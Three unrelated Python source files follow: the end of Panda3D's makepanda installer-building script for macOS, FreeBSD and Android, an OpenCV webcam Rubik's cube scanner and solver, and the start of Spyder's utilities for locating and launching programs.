cmd = '/Developer/usr/bin/packagemaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
elif os.path.exists("/Applications/Xcode.app/Contents/Applications/PackageMaker.app/Contents/MacOS/PackageMaker"):
cmd = '/Applications/Xcode.app/Contents/Applications/PackageMaker.app/Contents/MacOS/PackageMaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
elif os.path.exists("/Developer/Tools/PackageMaker.app/Contents/MacOS/PackageMaker"):
cmd = '/Developer/Tools/PackageMaker.app/Contents/MacOS/PackageMaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
elif os.path.exists("/Developer/Tools/packagemaker"):
cmd = '/Developer/Tools/packagemaker -build -f dstroot/' + pkg + '/ -p dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg -i /tmp/Info_plist'
elif os.path.exists("/Applications/PackageMaker.app/Contents/MacOS/PackageMaker"):
cmd = '/Applications/PackageMaker.app/Contents/MacOS/PackageMaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
else:
exit("Neither pkgbuild nor PackageMaker could be found!")
oscmd(cmd)
if os.path.isfile("/tmp/Info_plist"):
oscmd("rm -f /tmp/Info_plist")
# Now that we've built all of the individual packages, build the metapackage.
dist = open("dstroot/Panda3D/Panda3D.mpkg/Contents/distribution.dist", "w")
dist.write('<?xml version="1.0" encoding="utf-8"?>\n')
dist.write('<installer-script minSpecVersion="1.000000" authoringTool="com.apple.PackageMaker" authoringToolVersion="3.0.3" authoringToolBuild="174">\n')
dist.write(' <title>Panda3D SDK %s</title>\n' % (VERSION))
dist.write(' <options customize="always" allow-external-scripts="no" rootVolumeOnly="false"/>\n')
dist.write(' <license language="en" mime-type="text/plain">%s</license>\n' % ReadFile("doc/LICENSE"))
dist.write(' <choices-outline>\n')
for pkg in pkgs:
dist.write(' <line choice="%s"/>\n' % (pkg))
dist.write(' </choices-outline>\n')
dist.write(' <choice id="base" title="Panda3D Base Installation" description="This package contains the Panda3D libraries, configuration files and models/textures that are needed to use Panda3D. Location: /Developer/Panda3D/" start_enabled="false">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.base.pkg"/>\n')
dist.write(' </choice>\n')
dist.write(' <choice id="tools" title="Tools" tooltip="Useful tools and model converters to help with Panda3D development" description="This package contains the various utilities that ship with Panda3D, including packaging tools, model converters, and many more. Location: /Developer/Panda3D/bin/">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.tools.pkg"/>\n')
dist.write(' </choice>\n')
if not PkgSkip("PYTHON"):
dist.write(' <choice id="pythoncode" title="Python Support" tooltip="Python bindings for the Panda3D libraries" description="This package contains the \'direct\', \'pandac\' and \'panda3d\' python packages that are needed to do Python development with Panda3D. Location: /Developer/Panda3D/">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.pythoncode.pkg"/>\n')
dist.write(' </choice>\n')
if not PkgSkip("FFMPEG"):
dist.write(' <choice id="ffmpeg" title="FFMpeg Plug-In" tooltip="FFMpeg video and audio decoding plug-in" description="This package contains the FFMpeg plug-in, which is used for decoding video and audio files with OpenAL.')
if PkgSkip("VORBIS") and PkgSkip("OPUS"):
dist.write(' It is not required for loading .wav files, which Panda3D can read out of the box.">\n')
elif PkgSkip("VORBIS"):
dist.write(' It is not required for loading .wav or .opus files, which Panda3D can read out of the box.">\n')
elif PkgSkip("OPUS"):
dist.write(' It is not required for loading .wav or .ogg files, which Panda3D can read out of the box.">\n')
else:
dist.write(' It is not required for loading .wav, .ogg or .opus files, which Panda3D can read out of the box.">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.ffmpeg.pkg"/>\n')
dist.write(' </choice>\n')
#if not PkgSkip("OPENAL"):
# dist.write(' <choice id="openal" title="OpenAL Audio Plug-In" tooltip="OpenAL audio output plug-in" description="This package contains the OpenAL audio plug-in, which is an open-source library for playing sounds.">\n')
# dist.write(' <pkg-ref id="org.panda3d.panda3d.openal.pkg"/>\n')
# dist.write(' </choice>\n')
if not PkgSkip("FMODEX"):
dist.write(' <choice id="fmodex" title="FMOD Ex Plug-In" tooltip="FMOD Ex audio output plug-in" description="This package contains the FMOD Ex audio plug-in, which is a commercial library for playing sounds. It is an optional component as Panda3D can use the open-source alternative OpenAL instead.">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.fmodex.pkg"/>\n')
dist.write(' </choice>\n')
if os.path.isdir("samples"):
dist.write(' <choice id="samples" title="Sample Programs" tooltip="Python sample programs that use Panda3D" description="This package contains the Python sample programs that can help you with learning how to use Panda3D. Location: /Developer/Examples/Panda3D/">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.samples.pkg"/>\n')
dist.write(' </choice>\n')
dist.write(' <choice id="headers" title="C++ Header Files" tooltip="Header files for C++ development with Panda3D" description="This package contains the C++ header files that are needed in order to do C++ development with Panda3D. You don\'t need this if you want to develop in Python. Location: /Developer/Panda3D/include/" start_selected="false">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.headers.pkg"/>\n')
dist.write(' </choice>\n')
for pkg in pkgs:
size = GetDirectorySize("dstroot/" + pkg) // 1024
dist.write(' <pkg-ref id="org.panda3d.panda3d.%s.pkg" installKBytes="%d" version="1" auth="Root">file:./Contents/Packages/%s.pkg</pkg-ref>\n' % (pkg, size, pkg))
dist.write('</installer-script>\n')
dist.close()
oscmd('hdiutil create Panda3D-rw.dmg -volname "Panda3D SDK %s" -srcfolder dstroot/Panda3D' % (VERSION))
oscmd('hdiutil convert Panda3D-rw.dmg -format UDBZ -o %s' % (dmg_name))
oscmd('rm -f Panda3D-rw.dmg')
def MakeInstallerFreeBSD():
oscmd("rm -rf targetroot +DESC pkg-plist +MANIFEST")
oscmd("mkdir targetroot")
# Invoke installpanda.py to install it into a temporary dir
if RUNTIME:
InstallRuntime(destdir = "targetroot", prefix = "/usr/local", outputdir = GetOutputDir())
else:
InstallPanda(destdir = "targetroot", prefix = "/usr/local", outputdir = GetOutputDir())
if not os.path.exists("/usr/sbin/pkg"):
exit("Cannot create an installer without pkg")
plist_txt = ''
for root, dirs, files in os.walk("targetroot/usr/local/", True):
for f in files:
plist_txt += os.path.join(root, f)[21:] + "\n"
if not RUNTIME:
plist_txt += "@postexec /sbin/ldconfig -m /usr/local/lib/panda3d\n"
plist_txt += "@postunexec /sbin/ldconfig -R\n"
for remdir in ("lib/panda3d", "share/panda3d", "include/panda3d"):
for root, dirs, files in os.walk("targetroot/usr/local/" + remdir, False):
for d in dirs:
plist_txt += "@dir %s\n" % os.path.join(root, d)[21:]
plist_txt += "@dir %s\n" % remdir
oscmd("echo \"`pkg config abi | tr '[:upper:]' '[:lower:]' | cut -d: -f1,2`:*\" > " + GetOutputDir() + "/tmp/architecture.txt")
pkg_arch = ReadFile(GetOutputDir()+"/tmp/architecture.txt").strip()
dependencies = ''
if PkgSkip("PYTHON") == 0:
# If this version of Python was installed from a package or ports, let's mark it as dependency.
oscmd("rm -f %s/tmp/python_dep" % GetOutputDir())
oscmd("pkg query \"\n\t%%n : {\n\t\torigin : %%o,\n\t\tversion : %%v\n\t},\n\" python%s > %s/tmp/python_dep" % (SDK["PYTHONVERSION"][6:9:2], GetOutputDir()), True)
if os.path.isfile(GetOutputDir() + "/tmp/python_dep"):
python_pkg = ReadFile(GetOutputDir() + "/tmp/python_dep")
if python_pkg:
dependencies += python_pkg
manifest_txt = INSTALLER_PKG_MANIFEST_FILE[1:].replace("NAME", 'panda3d' if not RUNTIME else 'panda3d-runtime')
manifest_txt = manifest_txt.replace("VERSION", VERSION)
manifest_txt = manifest_txt.replace("ARCH", pkg_arch)
manifest_txt = manifest_txt.replace("ORIGIN", 'devel/panda3d' if not RUNTIME else 'graphics/panda3d-runtime')
manifest_txt = manifest_txt.replace("DEPENDS", dependencies)
manifest_txt = manifest_txt.replace("INSTSIZE", str(GetDirectorySize("targetroot") / 1024 / 1024))
WriteFile("pkg-plist", plist_txt)
WriteFile("+DESC", INSTALLER_PKG_DESCR_FILE[1:] if not RUNTIME else RUNTIME_INSTALLER_PKG_DESCR_FILE[1:])
WriteFile("+MANIFEST", manifest_txt)
oscmd("pkg create -p pkg-plist -r %s -m . -o . %s" % (os.path.abspath("targetroot"), "--verbose" if GetVerbose() else "--quiet"))
def MakeInstallerAndroid():
oscmd("rm -rf apkroot")
oscmd("mkdir apkroot")
# Also remove the temporary apks.
apk_unaligned = os.path.join(GetOutputDir(), "tmp", "panda3d-unaligned.apk")
apk_unsigned = os.path.join(GetOutputDir(), "tmp", "panda3d-unsigned.apk")
if os.path.exists(apk_unaligned):
os.unlink(apk_unaligned)
if os.path.exists(apk_unsigned):
os.unlink(apk_unsigned)
# Compile the Java classes into a Dalvik executable.
dx_cmd = "dx --dex --output=apkroot/classes.dex "
if GetOptimize() <= 2:
dx_cmd += "--debug "
if GetVerbose():
dx_cmd += "--verbose "
if "ANDROID_API" in SDK:
dx_cmd += "--min-sdk-version=%d " % (SDK["ANDROID_API"])
dx_cmd += os.path.join(GetOutputDir(), "classes")
oscmd(dx_cmd)
# Copy the libraries one by one. In case of library dependencies, strip
# off any suffix (e.g. libfile.so.1.0), as Android does not support them.
source_dir = os.path.join(GetOutputDir(), "lib")
target_dir = os.path.join("apkroot", "lib", SDK["ANDROID_ABI"])
oscmd("mkdir -p %s" % (target_dir))
# Determine the library directories we should look in.
libpath = [source_dir]
for dir in os.environ.get("LD_LIBRARY_PATH", "").split(':'):
dir = os.path.expandvars(dir)
dir = os.path.expanduser(dir)
if os.path.isdir(dir):
dir = os.path.realpath(dir)
if not dir.startswith("/system") and not dir.startswith("/vendor"):
libpath.append(dir)
def copy_library(source, base):
# Copy file to destination, stripping version suffix.
target = os.path.join(target_dir, base)
if not target.endswith('.so'):
target = target.rpartition('.so.')[0] + '.so'
if os.path.isfile(target):
# Already processed.
return
oscmd("cp %s %s" % (source, target))
# Walk through the library dependencies.
oscmd("ldd %s | grep .so > %s/tmp/otool-libs.txt" % (target, GetOutputDir()), True)
for line in open(GetOutputDir() + "/tmp/otool-libs.txt", "r"):
line = line.strip()
if not line:
continue
if '.so.' in line:
dep = line.rpartition('.so.')[0] + '.so'
oscmd("patchelf --replace-needed %s %s %s" % (line, dep, target), True)
else:
dep = line
# Find it on the LD_LIBRARY_PATH.
for dir in libpath:
fulldep = os.path.join(dir, dep)
if os.path.isfile(fulldep):
copy_library(os.path.realpath(fulldep), dep)
break
# Now copy every lib in the lib dir, and its dependencies.
for base in os.listdir(source_dir):
if not base.startswith('lib'):
continue
if not base.endswith('.so') and '.so.' not in base:
continue
source = os.path.join(source_dir, base)
if os.path.islink(source):
continue
copy_library(source, base)
# Same for Python extension modules. However, Android is strict about
# library naming, so we have a special naming scheme for these, in
# conjunction with a custom import hook to find these modules.
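# For example, the extension module core<ext-suffix> in the panda3d directory would be
# packaged as libpy.panda3d.core.so; the custom import hook on the device presumably
# maps dotted module names back to these file names at import time.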
if not PkgSkip("PYTHON"):
suffix = GetExtensionSuffix()
source_dir = os.path.join(GetOutputDir(), "panda3d")
for base in os.listdir(source_dir):
if not base.endswith(suffix):
continue
modname = base[:-len(suffix)]
source = os.path.join(source_dir, base)
copy_library(source, "libpy.panda3d.{}.so".format(modname))
# Same for standard Python modules.
import _ctypes
source_dir = os.path.dirname(_ctypes.__file__)
for base in os.listdir(source_dir):
if not base.endswith('.so'):
continue
modname = base.partition('.')[0]
source = os.path.join(source_dir, base)
copy_library(source, "libpy.{}.so".format(modname))
def copy_python_tree(source_root, target_root):
for source_dir, dirs, files in os.walk(source_root):
if 'site-packages' in dirs:
dirs.remove('site-packages')
if not any(base.endswith('.py') for base in files):
continue
target_dir = os.path.join(target_root, os.path.relpath(source_dir, source_root))
target_dir = os.path.normpath(target_dir)
os.makedirs(target_dir, 0o755)
for base in files:
if base.endswith('.py'):
target = os.path.join(target_dir, base)
shutil.copy(os.path.join(source_dir, base), target)
# Copy the Python standard library to the .apk as well.
from distutils.sysconfig import get_python_lib
stdlib_source = get_python_lib(False, True)
stdlib_target = os.path.join("apkroot", "lib", "python{0}.{1}".format(*sys.version_info))
copy_python_tree(stdlib_source, stdlib_target)
# But also copy over our custom site.py.
shutil.copy("panda/src/android/site.py", os.path.join(stdlib_target, "site.py"))
# And now make a site-packages directory containing our direct/panda3d/pandac modules.
for tree in "panda3d", "direct", "pandac":
copy_python_tree(os.path.join(GetOutputDir(), tree), os.path.join(stdlib_target, "site-packages", tree))
# Copy the models and config files to the virtual assets filesystem.
oscmd("mkdir apkroot/assets")
oscmd("cp -R %s apkroot/assets/models" % (os.path.join(GetOutputDir(), "models")))
oscmd("cp -R %s apkroot/assets/etc" % (os.path.join(GetOutputDir(), "etc")))
# Make an empty res folder. It's needed for the apk to be installable, apparently.
oscmd("mkdir apkroot/res")
# Now package up the application
oscmd("cp panda/src/android/pview_manifest.xml apkroot/AndroidManifest.xml")
aapt_cmd = "aapt package"
aapt_cmd += " -F %s" % (apk_unaligned)
aapt_cmd += " -M apkroot/AndroidManifest.xml"
aapt_cmd += " -A apkroot/assets -S apkroot/res"
aapt_cmd += " -I $PREFIX/share/aapt/android.jar"
oscmd(aapt_cmd)
# And add all the libraries to it.
oscmd("cd apkroot && aapt add ../%s classes.dex" % (apk_unaligned))
for path, dirs, files in os.walk('apkroot/lib'):
if files:
rel = os.path.relpath(path, 'apkroot')
oscmd("cd apkroot && aapt add ../%s %s/*" % (apk_unaligned, rel))
# Now align the .apk, which is necessary for Android to load it.
oscmd("zipalign -v -p 4 %s %s" % (apk_unaligned, apk_unsigned))
# Finally, sign it using a debug key. This is generated if it doesn't exist.
oscmd("apksigner debug.ks %s panda3d.apk" % (apk_unsigned))
# Clean up.
oscmd("rm -rf apkroot")
os.unlink(apk_unaligned)
os.unlink(apk_unsigned)
try:
if INSTALLER:
ProgressOutput(100.0, "Building installer")
target = GetTarget()
if target == 'windows':
fn = "Panda3D-"
dir = "Panda3D-" + VERSION
if RUNTIME:
fn += "Runtime-"
title = "Panda3D " + VERSION
else:
title = "Panda3D SDK " + VERSION
fn += VERSION
if not RUNTIME and SDK["PYTHONVERSION"] != "python2.7":
fn += '-py' + SDK["PYTHONVERSION"][6:]
if GetOptimize() <= 2:
fn += "-dbg"
if GetTargetArch() == 'x64':
fn += '-x64'
dir += '-x64'
MakeInstallerNSIS(fn + '.exe', title, 'C:\\' + dir)
if not RUNTIME:
MakeDebugSymbolArchive(fn + '-pdb.zip', dir)
elif (target == 'linux'):
MakeInstallerLinux()
elif (target == 'darwin'):
MakeInstallerOSX()
elif (target == 'freebsd'):
MakeInstallerFreeBSD()
elif (target == 'android'):
MakeInstallerAndroid()
else:
exit("Do not know how to make an installer for this platform")
if WHEEL:
ProgressOutput(100.0, "Building wheel")
from makewheel import makewheel
makewheel(WHLVERSION, GetOutputDir())
finally:
SaveDependencyCache()
##########################################################################################
#
# Print final status report.
#
##########################################################################################
WARNINGS.append("Elapsed Time: "+PrettyTime(time.time() - STARTTIME))
printStatus("Makepanda Final Status Report", WARNINGS)
print(GetColor("green") + "Build successfully finished, elapsed time: " + PrettyTime(time.time() - STARTTIME) + GetColor())
|
main.py
|
import cv2
import numpy as np
import colors
import position
from twophase import solve
import threading
from cube3d import RubiksCube
def show_scramble_2d(text=None, img=None):
cv2.imshow(text, img)
cv2.waitKey(0)
def create_cube(solution, start_position):
game = RubiksCube(solution, start_position)
game.run()
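# find_solution (below) feeds the 54-character facelet string assembled by
# create_scramble to the two-phase solver and falls back to 'not found' if the
# scanned cube state is invalid. The exact facelet convention (e.g. Kociemba's
# URFDLB ordering) depends on the twophase package and the colors.kociemba_colors mapping.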
def find_solution(scramble):
try:
solution = solve(scramble)
except Exception:  # the solver raises if the scanned cube state is invalid
solution = 'not found'
return solution
def create_scramble_board():
scramble_image = np.zeros([512, 512, 3], dtype=np.uint8)
scramble_image.fill(0)
height, width, _ = scramble_image.shape
for i in range(4):
cv2.rectangle(scramble_image, (i * int(width / 4), int(width / 4)), ((i + 1) * int(width / 4), int(width / 2)),
(80, 80, 80), 1)
if i != 3:
cv2.rectangle(scramble_image, (int(width / 4), i * int(width / 4)), (int(width / 2), (i + 1) * int(width / 4)),
(80, 80, 80), 1)
return scramble_image
def create_mask(hsv):
orange_mask = cv2.inRange(hsv, colors.lower_orange, colors.upper_orange)
green_mask = cv2.inRange(hsv, colors.lower_green, colors.upper_green)
blue_mask = cv2.inRange(hsv, colors.lower_blue, colors.upper_blue)
white_mask = cv2.inRange(hsv, colors.lower_white, colors.upper_white)
red_mask1 = cv2.inRange(hsv, colors.lower_red1, colors.upper_red1)
red_mask2 = cv2.inRange(hsv, colors.lower_red2, colors.upper_red2)
red_mask = red_mask1 | red_mask2
yellow_mask = cv2.inRange(hsv, colors.lower_yellow, colors.upper_yellow)
# Red wraps around the hue axis, so use the combined red mask here.
mask = orange_mask | green_mask | blue_mask | white_mask | red_mask | yellow_mask
mask_list = (white_mask, red_mask, green_mask, yellow_mask, orange_mask, blue_mask)
return mask, mask_list
def fill_scramble_board(board, arr, n):
height, width, _ = board.shape
start_pos = (int(width / 4) * position.scramble_board_position[n][0], int(width / 4) *
position.scramble_board_position[n][1])
for i in range(3):
for j in range(3):
cv2.rectangle(board, (start_pos[0] + j * int(width / 12), start_pos[1] + i * int(width / 12)),
(start_pos[0] + (j + 1) * int(width / 12), start_pos[1] + (i + 1) * int(width / 12)),
colors.rgb_colors[arr[i][j]], -1)
return board
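# identify_side_colors (below) splits the 240x240 cube ROI into a 3x3 grid of 80-pixel
# cells and assigns each cell the 1-based index of a colour mask whose centre region has
# at least 600 non-zero pixels (later masks overwrite earlier matches).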
def identify_side_colors(mask_list):
side = np.zeros((3, 3), dtype=np.uint8)
for k in range(len(mask_list)):
for i in range(3):
for j in range(3):
frame_part = mask_list[k][i * 80:(i + 1) * 80,
j * 80: (j + 1) * 80]
if (np.count_nonzero(frame_part[10:70, 10:70])) >= 600:
# if (np.count_nonzero(frame_part[25:55, 25:55])) >= 350:
side[i][j] = k + 1
return side
def create_n_config_frames(cap, height, width, sides_list):
font = cv2.FONT_HERSHEY_DUPLEX
_, frame = cap.read()
overlay = np.zeros((height, width, 3), np.uint8)
frame_with_rec = cv2.addWeighted(frame, 0.15, overlay, 0.1, 0)
x, y = int(width/2), int(height/2)
cv2.rectangle(frame_with_rec, (x-120, y-120), (x+120, y+120), (0, 0, 255), 5)
frame_with_rec = cv2.flip(frame_with_rec, 1)
cv2.putText(frame_with_rec, f'detected sides: {len(sides_list)}', (20, height-20), font, 1,
(0, 255, 0),
2, cv2.LINE_4)
cube_frame = frame[y-120:y+120, x-120:x+120]
frame_with_rec[y-120:y+120, x-120:x+120] = cv2.flip(cube_frame, 1)
cube_frame = cv2.GaussianBlur(cube_frame, (5, 5), 0)  # keep the blurred frame; the return value was previously discarded
return frame, frame_with_rec, cube_frame
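# check_side (below) draws scan feedback on the preview frame and returns +1 when the
# detected side matches the previous frame, or minus the current counter to reset it;
# once the counter reaches 30 stable frames the side is accepted and appended to sides_list.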
def check_side(frame_with_rec, scramble_image, sides_list, side, width, height, pre_side, counter) -> int:
x, y = int(width / 2), int(height / 2)
font = cv2.FONT_HERSHEY_DUPLEX
if np.count_nonzero(side) == 9:
cv2.rectangle(frame_with_rec, (x-120, y-120), (x+120, y+120), (0, 255, 255), 5)
if counter == 30:
cv2.rectangle(frame_with_rec, (x-120, y-120), (x+120, y+120), (0, 255, 0), 5)
cv2.waitKey(500)
is_scanned = True
for s in sides_list:
if s[1][1] == side[1][1]:
cv2.putText(frame_with_rec, f'scanned earlier, move on', (20, 20), font, 1,
(0, 0, 255), 2, cv2.LINE_4)
is_scanned = False
break
if is_scanned:
if len(sides_list) == 4:
side = np.rot90(side, 1)
elif len(sides_list) == 5:
side = np.rot90(side, -1)
fill_scramble_board(scramble_image, side, len(sides_list) + 1)
sides_list.append(side)
cv2.imshow('scramble', scramble_image)
if len(sides_list) < 4:
cv2.putText(frame_with_rec, f'move right side', (x, height - 20), font, 1,
(0, 255, 255), 2, cv2.LINE_4)
elif len(sides_list) == 4:
cv2.putText(frame_with_rec, f'move up', (x, height - 20), font, 1,
(0, 255, 255), 2, cv2.LINE_4)
elif len(sides_list) == 5:
cv2.putText(frame_with_rec, f'up twice', (x, height - 20), font, 1,
(0, 255, 255), 2, cv2.LINE_4)
cv2.imshow('frame', frame_with_rec)
cv2.waitKey(500)
if np.equal(side, pre_side).all():
return 1
return -counter
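# recognize_cube (below) keeps scanning frames until six distinct sides have been
# captured; each candidate side must be classified identically for ~30 consecutive
# frames before it is accepted, and pressing ESC aborts the scan.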
def recognize_cube(cap):
sides_list = []
pre_side = None
_, frame = cap.read()
height, width, _ = frame.shape
scramble_image = create_scramble_board()
while True:
counter = 0
while True:
frame, frame_with_rec, cube_frame = create_n_config_frames(cap, height, width, sides_list)
hsv = cv2.cvtColor(cube_frame, cv2.COLOR_BGR2HSV)
mask, mask_list = create_mask(hsv)
result = cv2.bitwise_and(cube_frame, cube_frame, mask=mask)
side = identify_side_colors(mask_list)
counter += check_side(frame_with_rec, scramble_image, sides_list, side, width, height, pre_side, counter)
key = cv2.waitKey(5)
if key == 27:
return
pre_side = side.copy()
cv2.imshow('result', result)
cv2.imshow('frame', frame_with_rec)
cv2.imshow('mask', mask)
if len(sides_list) == 6:
return sides_list, scramble_image
if counter > 30:
break
def create_scramble(kociemba_positions, sides_list):
scramble = ''
for side in sides_list:
for j in range(3):
for k in range(3):
scramble += kociemba_positions[side[j][k]]
return scramble
def destroy_windows():
windows = ('mask', 'frame', 'result')
for window in windows:
cv2.destroyWindow(window)
def show_solution(scramble_image, solution):
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(scramble_image, 'Solution:', (20, scramble_image.shape[0] - 40), font, 0.4,
(255, 255, 255),
1, cv2.LINE_4)
cv2.putText(scramble_image, f'{solution}', (20, scramble_image.shape[0] - 20), font, 0.4,
(255, 255, 255),
1, cv2.LINE_4)
cv2.imshow("scramble", scramble_image)
def main():
cap = cv2.VideoCapture(0)
sides_list, scramble_image = recognize_cube(cap)
cap.release()
destroy_windows()
_, sides_list = zip(*sorted(zip(position.sorted_sides, sides_list)))
kociemba_positions = {sides_list[i - 1][1][1]: colors.kociemba_colors[i] for i in range(1, 7)}
start_position = position.start_position[(sides_list[0][1][1], sides_list[2][1][1])]
scramble = create_scramble(kociemba_positions, sides_list)
solution = find_solution(scramble)
show_solution(scramble_image, solution)
threading.Thread(target=create_cube, args=(solution, start_position)).start()  # pass args instead of calling create_cube immediately
if __name__ == "__main__":
main()
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
from pkg_resources import parse_version
import psutil
# Local imports
from spyder.config.base import (is_stable_version, running_under_pytest,
get_home_dir, running_in_mac_app)
from spyder.config.utils import is_anaconda
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return temporary Spyder directory, checking previously that it exists.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# function fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
